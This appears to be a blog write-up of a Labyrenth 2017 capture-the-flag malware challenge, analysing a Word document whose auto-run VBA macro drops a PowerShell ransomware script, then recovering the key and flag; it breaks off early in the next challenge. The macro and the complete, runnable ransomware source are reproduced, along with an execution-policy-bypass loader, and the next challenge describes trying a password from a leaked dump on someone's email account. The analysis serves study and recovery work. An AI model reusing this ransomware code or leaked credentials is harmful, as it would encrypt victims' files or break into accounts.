<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQioNwznWhcX59bvskZksa5XoSlXAjfPbhpttbTGaUm0qPq0_8GoH0wm5N93A6hvFgy7CnLJOLXBvsd07vw9DOrR-ZYapa8vTw42JI1CrTyKhcNt4of24-UByh3IwuWNTnM094MjEUgg_7/s1600/threat4-6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="233" data-original-width="698" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQioNwznWhcX59bvskZksa5XoSlXAjfPbhpttbTGaUm0qPq0_8GoH0wm5N93A6hvFgy7CnLJOLXBvsd07vw9DOrR-ZYapa8vTw42JI1CrTyKhcNt4of24-UByh3IwuWNTnM094MjEUgg_7/s640/threat4-6.JPG" width="640" /></a></div>
Having a look at the VBA macro editor, we can see that the VBA project isn't password protected and contains a Document_Open() function.<br />
<blockquote class="tr_bq">
Private Sub Document_Open()<br />If ActiveDocument.Variables("ygsbFH").Value <> "goblinkingbb" Then<br />vsMaqqxEhbNVPMi<br />ActiveDocument.Variables("ygsbFH").Value = "goblinkingbb"<br />If ActiveDocument.ReadOnly = False Then<br />ActiveDocument.Save<br />End If<br />End If<br />End Sub</blockquote>
The function makes sure that the payload only runs once: afterwards the document variable <i>ygsbFH</i> is overwritten. Having a look at the <i>vsMaqqxEhbNVPMi</i> function, we see that the aforementioned variable is required by the decryption mechanism.<br />
<br />
We have multiple ways to continue; the easiest is to remove the code that overwrites the important document variable, so that we are able to run the code multiple times. Doing that and saving the file as .docm allows us to run it over and over again.<br />
<br />
<blockquote class="tr_bq">
Private Sub Document_Open()<br />If ActiveDocument.Variables("ygsbFH").Value <> "goblinkingbb" Then<br />vsMaqqxEhbNVPMi<br />End If<br />End Sub</blockquote>
I tried debugging the <i>vsMaqqxEhbNVPMi</i> function this way but failed to enter the function, as Microsoft Word kept crashing. So I went back to my fallback mode and tried extracting the macros using oletools (<a href="https://github.com/decalage2/oletools">https://github.com/decalage2/oletools</a>) and copying them into a new .docm file. <br />To dump the macros from bbransom.doc, I placed the file in the ole folder and used<br />
<blockquote class="tr_bq">
python olevba.py bbransom.doc > macros.txt</blockquote>
I mentioned before that the <i>ygsbFH</i> variable is important, so I dumped the variable from the original file and reloaded it in my own .docm. A code reference for file read/write operations in VBA is <a href="http://codevba.com/office/read_text_file_into_string_variable.htm">http://codevba.com/office/read_text_file_into_string_variable.htm</a>. I added the following code to the Document_Open() function to dump the variable to var.txt<br /><br />
<blockquote class="tr_bq">
Dim myFile As String<br />myFile = "var.txt"<br />Open myFile For Output As #1<br />Write #1, ActiveDocument.Variables("ygsbFH").Value<br />Close #1</blockquote>
<br />
I removed the quotation marks and the newline from var.txt and saved it on my Desktop.<br /><br />I created a new document and pasted the extracted macros from oletools into it. I noticed that the private function is the decoding function and references the <i>ygsbFH</i> variable. I replaced the original function with a modified one that loads the variable from file.<br /><br />
<blockquote class="tr_bq">
Private Function cuJgIWtkPd(dytGKUVpoS As Variant, QVuOQXtBcV As Integer)<br />Dim myFile As String<br />myFile = "C:\Users\jones\Desktop\var.txt"<br />Dim iFile As Integer: iFile = FreeFile<br />Open myFile For Input As #iFile<br />ygsbFH = Input(LOF(iFile), iFile)<br />Close #iFile<br />Dim TOJDOAXFXr, eXrxcIdKmp As String, cAJHqnrFBj, QnGcAinJcu<br />eXrxcIdKmp = ygsbFH<br />TOJDOAXFXr = ""<br />cAJHqnrFBj = 1<br />While cAJHqnrFBj < UBound(dytGKUVpoS) + 2<br />QnGcAinJcu = cAJHqnrFBj Mod Len(eXrxcIdKmp): If QnGcAinJcu = 0 Then QnGcAinJcu = Len(eXrxcIdKmp)<br />TOJDOAXFXr = TOJDOAXFXr + Chr(Asc(Mid(eXrxcIdKmp, QnGcAinJcu + QVuOQXtBcV, 1)) Xor CInt(dytGKUVpoS(cAJHqnrFBj - 1)))<br />cAJHqnrFBj = cAJHqnrFBj + 1<br />Wend<br />cuJgIWtkPd = TOJDOAXFXr<br />End Function</blockquote>
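The decoder above only differs from plain XOR in how it indexes the key: VBA's 1-based <i>Mod</i> arithmetic plus a per-call offset (<i>QVuOQXtBcV</i>). The following is an added Python port of that routine, written for this write-up and not part of the original macro, so encoded strings can be recovered offline instead of stepping through Word. <i>DEMO_KEY</i> is a constructed stand-in; the real key is the document variable <i>ygsbFH</i>, which the write-up does not reproduce.<br />

```python
# Added example (not part of the write-up): a Python port of the macro's string
# decoder cuJgIWtkPd. DEMO_KEY is a constructed stand-in for the document
# variable ygsbFH, which is not reproduced in the write-up.
DEMO_KEY = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/"  # constructed


def vba_xor_decode(codes, key, offset):
    """Port of cuJgIWtkPd(dytGKUVpoS, QVuOQXtBcV) with VBA's 1-based arithmetic kept.

    For the i-th code (i = 1..N): q = i Mod Len(key), where 0 is mapped to Len(key);
    the key character is Mid(key, q + offset, 1) and is XORed with the code value.
    """
    n = len(key)
    if n == 0:
        raise ValueError("empty key")
    out = []
    for i in range(1, len(codes) + 1):          # cAJHqnrFBj runs 1 .. UBound + 1
        q = i % n or n                          # QnGcAinJcu, with 0 -> Len(key)
        pos = q + offset                        # 1-based position handed to Mid()
        if pos < 1 or pos > n:
            # Mid() past the end returns "" and Asc("") raises a runtime error in VBA
            raise ValueError("key position %d outside 1..%d at code %d" % (pos, n, i))
        out.append(chr(ord(key[pos - 1]) ^ int(codes[i - 1])))
    return "".join(out)


def vba_xor_encode(text, key, offset):
    """Inverse operation (XOR is symmetric): the integer list the macro would carry."""
    return [ord(ch) for ch in vba_xor_decode([ord(c) for c in text], key, offset)]


if __name__ == "__main__":
    # Round trip on the path the write-up recovered, using the constructed key
    codes = vba_xor_encode(r"C:\Users\public\panlaby.ps1", DEMO_KEY, 2)
    print(codes)
    print(vba_xor_decode(codes, DEMO_KEY, 2))
```

Because Mid() past the end of the key yields an empty string, every encoded string has to fit within the key length minus its offset; the port raises in that case rather than silently mis-decoding, which is also a quick sanity check that the right key and offset were extracted.<br />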
Next I had a look at the extracted macros. One can see the MsgBox we saw when running the original file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLC15aPl0ElWF-9i-z9YPDapRlgtpHEkfom4Ex6qd87sK1Jm72OsDpDsEogddcT0fvyfSr6_GGO8IV0yGkjErby8y3MfJvpwBhnMfhZbJJLTitwZPLWAUw4FRkwbR1FI06cdHrlv2xG03z/s1600/threat4-4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="322" data-original-width="1071" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLC15aPl0ElWF-9i-z9YPDapRlgtpHEkfom4Ex6qd87sK1Jm72OsDpDsEogddcT0fvyfSr6_GGO8IV0yGkjErby8y3MfJvpwBhnMfhZbJJLTitwZPLWAUw4FRkwbR1FI06cdHrlv2xG03z/s1600/threat4-4.JPG" /></a></div>
<br />
<br />
The next line creates a text file, which looks promising. Letting the decoding function do its work, we get the file path <i>C:\Users\public\panlaby.ps1</i>.<br />
<br />
The next instructions all decode strings and write them to the text file, so I ran the script up to a.Close and made a backup of the file by opening Windows Explorer and copying it to the desktop. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitF79No07b1i1QJVk2PrQnxjPICiOe6xphZ3uZX2T22hKvO1H2nGFq0FqrEFX5V-BvdyT3h0n9V0TOdeQ7AvRQnBtgyofGghVZImuf_t8_LVCU_tebRzc_fAr-Hg86FmhTcaoqHfQAId_g/s1600/threat4-5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="302" data-original-width="1019" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitF79No07b1i1QJVk2PrQnxjPICiOe6xphZ3uZX2T22hKvO1H2nGFq0FqrEFX5V-BvdyT3h0n9V0TOdeQ7AvRQnBtgyofGghVZImuf_t8_LVCU_tebRzc_fAr-Hg86FmhTcaoqHfQAId_g/s1600/threat4-5.JPG" /></a></div>
The last lines of the macro function create a new WScript.Shell object and run the file. I once again let the decoding function do its work and extracted the command line options.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtronxua3JxovdBrRq9IEzf00nG23S7Irk_iwQx9hRzZUc-SAAgyPxcpbCozdOcVhnYgBEbE_pOTuV7YZ5X-yUYUy6F1cyPq-NsnfwqVDBxTDoFdmB0uj76BYoON_aNAr3OyLCgrgmUTIl/s1600/threat4-3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="45" data-original-width="403" height="35" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtronxua3JxovdBrRq9IEzf00nG23S7Irk_iwQx9hRzZUc-SAAgyPxcpbCozdOcVhnYgBEbE_pOTuV7YZ5X-yUYUy6F1cyPq-NsnfwqVDBxTDoFdmB0uj76BYoON_aNAr3OyLCgrgmUTIl/s320/threat4-3.JPG" width="320" /></a></div>
The second parameter is <i>C:\Users\public\panlaby.ps1</i><br />
That's it for the first part of the challenge.<br />
<br />
<h4>
Part 2</h4>
The next part of the challenge is about understanding the extracted panlaby.ps1. For reference, this is the original file:<br />
<br />
<blockquote class="tr_bq">
$I1lII11ll1I = [System.Text.Encoding]::UTF8<br />$III111lllI1 = "DwImSAI1CgMYSQQ+GhoO"<br />$111IlIIIlll = $I1lII11ll1I.GetBytes("For great justice")<br />$III111lllI1 = $I1lII11ll1I.GetString([System.Convert]::FromBase64String($III111lllI1))<br />$lllII111lIl = $I1lII11ll1I.GetBytes($III111lllI1)<br />$183846385837478 = $(for ($i = 0; $i -lt $lllII111lIl.length; ) {<br />for ($j = 0; $j -lt $111IlIIIlll.length; $j++) {<br />$lllII111lIl[$i] -bxor $111IlIIIlll[$j]<br />$i++<br />if ($i -ge $lllII111lIl.Length) {<br />$j = $111IlIIIlll.length<br />}<br />}<br />})<br />$183846385837478 = $I1lII11ll1I.GetString($183846385837478)<br />$87462387472378 = "OjsjcvRgahjsHbsbbcghhdUjjcRtgWhscJhsdUjsbndRgj"<br />$4874585896348756 = ([Char[]](GeT-RaNdom -Input $(48..57 + 65..90 + 97..122) -Count 24)) -join ""<br />[byte[]]$462873463874364=[system.Text.Encoding]::Unicode.GetBytes($183846385837478)<br />$CFFGCHFFDSEUHGGCFT = [Text.Encoding]::UTF8.GetBytes($87462387472378)<br />$gYGXCbbdcRgsbfIuahs = neW-Object System.Security.Cryptography.RijndaelManaged<br />$gYGXCbbdcRgsbfIuahs.Key = (new-Object Security.Cryptography.Rfc2898DeriveBytes $183846385837478, $CFFGCHFFDSEUHGGCFT, 5).GetBytes(32)<br />$gYGXCbbdcRgsbfIuahs.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15]<br />$gYGXCbbdcRgsbfIuahs.Padding="Zeros"<br />$gYGXCbbdcRgsbfIuahs.Mode="CBC"<br />$RgxnnHgxghRThajcUJJ= gdr|where {$_.Free}|Sort-ObjeCt -Descending<br />foreach($TgbcRThahjdRRGHjj in $RgxnnHgxghRThajcUJJ){<br />gci $TgbcRThahjdRRGHjj.root -Recurse -Include "*.urbb","*.toby"|%{<br />try{<br />$ChhxnRJhhsncGHH = New-Object System.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)<br />if ($ChhxnRJhhsncGHH.BaseStream.Length -lt 2048){return}<br />else<br />{<br />$gjYujsjdRThsncGHja = 2048<br />}<br />$462873463874364 = 
$ChhxnRJhhsncGHH.ReadBytes($gjYujsjdRThsncGHja)<br />$ChhxnRJhhsncGHH.Close()<br />$JkkxTYajncGRahjdjHJ = $gYGXCbbdcRgsbfIuahs.CreateEncryptor()<br />$oUUixjHHhjjxRTHNJ = new-Object IO.MemoryStream<br />$HhxjhTTYhajdJJJasO = new-Object Security.Cryptography.CryptoStream $oUUixjHHhjjxRTHNJ,$JkkxTYajncGRahjdjHJ,"Write"<br />$HhxjhTTYhajdJJJasO.Write($462873463874364, 0,$462873463874364.Length)<br />$HhxjhTTYhajdJJJasO.Close()<br />$oUUixjHHhjjxRTHNJ.Close()<br />$JkkxTYajncGRahjdjHJ.Clear()<br />$Bnx587Fhsjc7ijF4 = $oUUixjHHhjjxRTHNJ.ToArray()<br />$HhjxcRTahjdUYUIN = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)<br />$HhjxcRTahjdUYUIN.Write($Bnx587Fhsjc7ijF4,0,$Bnx587Fhsjc7ijF4.Length)<br />$HhjxcRTahjdUYUIN.Close()<br />$GFfstdtHjsjRhgjs=$_.Name+'.bbmine'<br />ren -Path $_.FullName -NewName $GFfstdtHjsjRhgjs -Force<br />$uUhxjhcTYhajWRahhd = $_.Directory.ToString() + '\_HELP_instructions.html'<br />$YuxjncRgahdjjcTYHJ = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGgxPkkgYW0gdGhlIGdvYmxpbiBraW5nITwvaDE+PGJyPkFsbCB1ciBiYnogIGFyZSBiZWxvbmcgdG8gdXMuIFlvdSBoYXZlIG5vIGNoYW5jZSB0byBzdXJ2aXZlIG1ha2UgeW91ciB0aW1lLg=="));<br />New-Item -Path $uUhxjhcTYhajWRahhd -ItemType file -Value $YuxjncRgahdjjcTYHJ<br />Add-Content -Path $uUhxjhcTYhajWRahhd -Value ("<h1>CLIENT ID: $4874585896348756 <br></h1>")<br />Add-Content -Path $uUhxjhcTYhajWRahhd -Value ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGgyPkNhbXBhaWduIElEOiBGaTQ4VzFVVEF3TVNRVmtRUmsxYVZBQi9EVVFSVnhRQkJ4ZEdDQmNTRUZ0VUIzUlhFRUpYRkZ4UlRFUmJRaGRIV2dWY2RncEtRMThUQVZSREV3dE5Ga1JmVndNNyA8YnI+PC9oMj4=")));<br />Add-Content -Path $uUhxjhcTYhajWRahhd -Value ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGgzPlZlcnNpb24gS2V5OiBGb3IgZ3JlYXQganVzdGljZSA8YnI+PC9oMz4=")));<br />}<br />catch<br />{<br />}<br 
/>}}<br />function YHBFDXGFGHGJHDRSD() {<br />$fhYThncwwIjfDFGHsf = (Get-VaRiable MyInvocation -Scope 1).Value<br />$YHnbbfgcgfcEThhYH = $fhYThncwwIjfDFGHsf.MyCommand.Path<br />Remove-ITem $YHnbbfgcgfcEThhYH<br />}<br />YHBFDXGFGHGJHDRSD<br /></blockquote>
A few things stick out immediately: the Security.Cryptography calls and _HELP_instructions.html. This looks like PowerShell ransomware. Looking further at the script, one can also see two strings that look like file extensions, .urbb and .toby.<br />To get a better understanding of the code I started renaming variables and removed the last few lines, which were responsible for deleting the script file.<br /><br />I ran the script by creating a batch file I called loader.cmd:<br /><br />
<blockquote class="tr_bq">
powershell.exe -NoP -sta -NonI -ep bypass "C:\Users\jones\Desktop\panlaby.ps1"<br />pause</blockquote>
<br />
<br />
Running the file confirmed my suspicion about the ransomware.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLm-xSSlFppEWViEN5BWbo0_HbL-DU8SMpFxRtW6jwmCE1pWanztX85sWQJbBdBU0_pRD0MFgWFuriDwud-iYNyjAmVxkfXj4ehTqGdzH6yPL5VS1Oeic7RYayx16xh4WA4kSV-ETugH4I/s1600/threat4-7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="284" data-original-width="643" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLm-xSSlFppEWViEN5BWbo0_HbL-DU8SMpFxRtW6jwmCE1pWanztX85sWQJbBdBU0_pRD0MFgWFuriDwud-iYNyjAmVxkfXj4ehTqGdzH6yPL5VS1Oeic7RYayx16xh4WA4kSV-ETugH4I/s640/threat4-7.JPG" width="640" /></a></div>
<br />
I noticed that it tries to read 2048 bytes of a given file and stops if that fails, so I created a .toby file on my desktop with more than 2048 bytes and ran loader.cmd once again. The script found the file, encrypted the first 2048 bytes, changed the extension and created a _HELP_instructions.html on my desktop.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-Mi9Xkmz6GBVmeRGmpN9rAvFIKJlYnv3VVfLIhTXEyz1EzdBYIdgL1Y0kNRwN62n2Gvx0Vy2dUrvs3OsBTMuMnKlN8Gh1MeJKxniP8JhtN-qFeigXuo8Tp7mghR1Nj1t_wB0nfoDlcrYw/s1600/threat4-8.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="183" data-original-width="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-Mi9Xkmz6GBVmeRGmpN9rAvFIKJlYnv3VVfLIhTXEyz1EzdBYIdgL1Y0kNRwN62n2Gvx0Vy2dUrvs3OsBTMuMnKlN8Gh1MeJKxniP8JhtN-qFeigXuo8Tp7mghR1Nj1t_wB0nfoDlcrYw/s1600/threat4-8.JPG" /></a></div>
Opening the instruction file we get<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLvu7eZPEaPQ_d0UXpnIW1WgO7bpTrlIbjmRhoWcukLp-YbvIkQ1BWZUkoPmvNk3Muy9_5d5li-58US2iePr5d-AS1YSvcFqBij5SrmiDL4Z_2Hd9swfwv0Y1hcyjpqvC9ZNSFq5h34P_I/s1600/threat4-9.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="292" data-original-width="1435" height="130" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLvu7eZPEaPQ_d0UXpnIW1WgO7bpTrlIbjmRhoWcukLp-YbvIkQ1BWZUkoPmvNk3Muy9_5d5li-58US2iePr5d-AS1YSvcFqBij5SrmiDL4Z_2Hd9swfwv0Y1hcyjpqvC9ZNSFq5h34P_I/s640/threat4-9.JPG" width="640" /></a></div>
<br />
The next step is to figure out how and where these values are created.<br />For the Client ID we find a Get-Random call:<br />
<blockquote class="tr_bq">
$4874585896348756 = ([Char[]](GeT-RaNdom -Input $(48..57 + 65..90 + 97..122) -Count 24)) -join ""</blockquote>
The Campaign ID and Version Key are static; to retrieve them I pasted the following lines into a PowerShell window<br /><br />
<blockquote class="tr_bq">
([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGgyPkNhbXBhaWduIElEOiBGaTQ4VzFVVEF3TVNRVmtRUmsxYVZBQi9EVVFSVnhRQkJ4ZEdDQmNTRUZ0VUIzUlhFRUpYRkZ4UlRFUmJRaGRIV2dWY2RncEtRMThUQVZSREV3dE5Ga1JmVndNNyA8YnI+PC9oMj4=")))<br />([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGgzPlZlcnNpb24gS2V5OiBGb3IgZ3JlYXQganVzdGljZSA8YnI+PC9oMz4=")))</blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD0dD0gq_mbKIrhB6vT0XKrNxF3BHcx-wooJ5KDHtFeXhX098Cjoy2B0D7E3Xy3_FrUonk9KEikJFZOhwmpbLtBc1-0-nBvRf2Fxewob5HlExHnah6JGEBHjkhCoUHE4Y8keGZpVyJea37/s1600/threat4-10.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="86" data-original-width="962" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD0dD0gq_mbKIrhB6vT0XKrNxF3BHcx-wooJ5KDHtFeXhX098Cjoy2B0D7E3Xy3_FrUonk9KEikJFZOhwmpbLtBc1-0-nBvRf2Fxewob5HlExHnah6JGEBHjkhCoUHE4Y8keGZpVyJea37/s1600/threat4-10.JPG" /></a></div>
<br />
So whatever file we are encrypting, the Client ID will always be a random value, whereas the Campaign ID and Version Key will always be the same. I had a further look at the PowerShell script and realized there is nothing more to do with it. So I kept thinking about what to do with the given values.<br /><br />
<h4>
Part 3</h4>
The final part was about extracting the flag from the given values. By trial and error I base64-decoded the Campaign ID and XORed the result with the key "For great justice" using the following Python script<br /><br />
<blockquote class="tr_bq">
<br />import base64<br />target = 'Fi48W1UTAwMSQVkQRk1aVAB/DUQRVxQBBxdGCBcSEFtUB3RXEEJXFFxRTERbQhdHWgVcdgpKQ18TAVRDEwtNFkRfVwM7'<br />xor_key = 'For great justice'<br />res = ''<br />target = base64.b64decode(target)<br />for i in range(0,len(target)):<br /> res+= chr(ord(target[i])^ord(xor_key[i%len(xor_key)]))<br />print res</blockquote>
The output of the script is our flag for threat 4<br />
<blockquote class="tr_bq">
<b>PAN{2afbfa3e5937e9b610fdfcfbbad27b28bb0f908d17d33f90e8c8ad573a8e064f}</b></blockquote>
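The Part 2 script and the Part 3 decode use the same masking: base64, then repeating-key XOR with the "Version Key". The following added example (written for this write-up, not the author's script and not part of the sample) pulls both together: it recovers the password the script feeds into Rfc2898DeriveBytes, derives the AES key and IV exactly as the script does, and decodes the Campaign ID with the same helper. All constants are lifted from panlaby.ps1 and the ransom note above; the stdlib covers everything except the AES step, for which <i>decrypt_header</i> and <i>restore_file</i> assume the third-party <i>cryptography</i> package is installed.<br />

```python
import base64
import hashlib

# Added example (not the author's script): key-material recovery for panlaby.ps1
# plus the Campaign ID decode. Constants are lifted from the script as shown above.
PASSWORD_B64 = "DwImSAI1CgMYSQQ+GhoO"                             # $III111lllI1
VERSION_KEY = b"For great justice"                                # $111IlIIIlll, "Version Key"
PBKDF2_SALT = b"OjsjcvRgahjsHbsbbcghhdUjjcRtgWhscJhsdUjsbndRgj"     # $87462387472378
PBKDF2_ITERATIONS = 5
IV_SEED = b"alle"
HEADER_LEN = 2048                                                 # bytes encrypted per file
CAMPAIGN_ID_B64 = (
    "Fi48W1UTAwMSQVkQRk1aVAB/DUQRVxQBBxdGCBcSEFtUB3RXEEJXFFxRTERbQhdHWgVcdgpKQ18TAVRDEwtNFkRfVwM7"
)


def xor_with_key(data, key):
    """Repeating-key XOR, the loop the script runs to unmask its password."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_pbkdf2_password():
    """$183846385837478: base64-decode, then XOR with the version key."""
    return xor_with_key(base64.b64decode(PASSWORD_B64), VERSION_KEY).decode("utf-8")


def derive_aes_key_and_iv(password):
    """Rfc2898DeriveBytes(string, byte[], int) is PBKDF2-HMAC-SHA1 over the UTF-8
    password; the IV is the first 16 bytes of SHA1("alle")."""
    key = hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), PBKDF2_SALT,
                              PBKDF2_ITERATIONS, dklen=32)
    iv = hashlib.sha1(IV_SEED).digest()[:16]
    return key, iv


def decode_campaign_id():
    """The Part 3 step: the Campaign ID is the flag, masked with the same XOR."""
    return xor_with_key(base64.b64decode(CAMPAIGN_ID_B64), VERSION_KEY).decode("utf-8")


def decrypt_header(encrypted_header, key, iv):
    """AES-256-CBC with PaddingMode.Zeros; 2048 is a block multiple, so nothing is
    stripped. Needs the third-party 'cryptography' package (imported lazily)."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    if len(encrypted_header) != HEADER_LEN:
        raise ValueError("expected exactly %d encrypted bytes" % HEADER_LEN)
    decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    return decryptor.update(encrypted_header) + decryptor.finalize()


def restore_file(path):
    """Undo the damage to one .bbmine file: decrypt its header in place, drop the suffix."""
    import os
    key, iv = derive_aes_key_and_iv(recover_pbkdf2_password())
    with open(path, "r+b") as fh:
        header = fh.read(HEADER_LEN)
        fh.seek(0)
        fh.write(decrypt_header(header, key, iv))
    if path.endswith(".bbmine"):
        os.rename(path, path[:-len(".bbmine")])


if __name__ == "__main__":
    pw = recover_pbkdf2_password()
    key, iv = derive_aes_key_and_iv(pw)
    print("password :", pw)
    print("AES key  :", key.hex())
    print("IV       :", iv.hex())
    print("campaign :", decode_campaign_id())
```

Since the password, salt, iteration count and IV seed are all hard-coded, every victim gets the same key and IV; that is why the sample is fully recoverable and why the Client ID in the note, being a fresh Get-Random value, plays no role in decryption.<br />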
Mr. Joneshttp://www.blogger.com/profile/15346255825408058734noreply@blogger.com0tag:blogger.com,1999:blog-761861405376292116.post-86527525042272886222017-07-24T16:54:00.002+02:002017-07-24T17:02:16.066+02:00Palo Alto Labyrenth Threat 03 Writeup<h2>
Labyrenth 2017 Threat 03</h2>
Threat 03 is different from all other challenges (except Random 6) in that it presents us with a website instead of a download: <a href="http://youwontfind.me/">http://youwontfind.me/</a><br />
<br />
The first step I took was to visit the website<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCZ-g2rJefQvtRSsRztjrjWMuzFUpPIfKfpVpOAJMqjCpqlzl0SqYDMul9Xg7iAIIZRKk2ihSXDo_wUDUYVz06qsVtI3UCXg9Xee4YkHvuuIm99W9IYeBnsC5rXhR_R-lK7zYbt7V-eukY/s1600/threat3-1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="699" data-original-width="1600" height="279" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCZ-g2rJefQvtRSsRztjrjWMuzFUpPIfKfpVpOAJMqjCpqlzl0SqYDMul9Xg7iAIIZRKk2ihSXDo_wUDUYVz06qsVtI3UCXg9Xee4YkHvuuIm99W9IYeBnsC5rXhR_R-lK7zYbt7V-eukY/s640/threat3-1.JPG" width="640" /></a></div>
and check the source of each page I found.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil9eKXs1G49jVpjkF9AijuVNv296vE0RdCZiUXBY2r1OENlnG_xDUe65a0FzHjgDZIwopKJ8FX2ePZP00qS7ag902MMaYIWOwBfh-8sNvj3RVQLHxRXElFhz6nM7Zcl3cJf0TleFPYvs9b/s1600/threat3-2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="311" data-original-width="1265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil9eKXs1G49jVpjkF9AijuVNv296vE0RdCZiUXBY2r1OENlnG_xDUe65a0FzHjgDZIwopKJ8FX2ePZP00qS7ag902MMaYIWOwBfh-8sNvj3RVQLHxRXElFhz6nM7Zcl3cJf0TleFPYvs9b/s1600/threat3-2.JPG" /></a></div>
The source of the main site is shown above and contains a suspicious comment:<br />
<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">642C740D0C297E3A5E1B4D6A70346C24175D56485F7F2B3C0E1F1C6D716F3C2013095B405B2C2F385D491C62763930231A560E13507879390B414E36216B327C1A065E42022C2032</span></blockquote>
<br />
The next steps I took were to try multiple decodings of that string and to run all kinds of steganography tools on the images, which turned out to be a dead end. If you look at the source you can see a copyright notice by s. williams.<br />
The next thing I did was a whois lookup on youwontfind.me, which returned<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP59lOhha11uTpcxTmxTaxVSDpNPSh-VSmmbDPBktHK9xH5Wmfacx9M2ynDE_002Z3k8rnAZUKfx2DZ6edzseM2mR4fmigUEQI5SZdojCEMxeSqhs0Ndz44SKkqxFnvFlZIDUouF-rKRiY/s1600/threat3-3+-+Copy.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="473" data-original-width="790" height="382" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP59lOhha11uTpcxTmxTaxVSDpNPSh-VSmmbDPBktHK9xH5Wmfacx9M2ynDE_002Z3k8rnAZUKfx2DZ6edzseM2mR4fmigUEQI5SZdojCEMxeSqhs0Ndz44SKkqxFnvFlZIDUouF-rKRiY/s640/threat3-3+-+Copy.JPG" width="640" /></a></div>
I googled the email address <i>Sarah.Williams.1986@yandex.com</i> and found a password dump, so I tried to log in to the email account with the given password, which obviously didn't work out (I realized it wouldn't make much sense, as everyone could just take over the account).<br />
I tried other hits and found a LinkedIn profile that looked promising: <a href="https://www.linkedin.com/in/sarahwilliams1986">https://www.linkedin.com/in/sarahwilliams1986</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
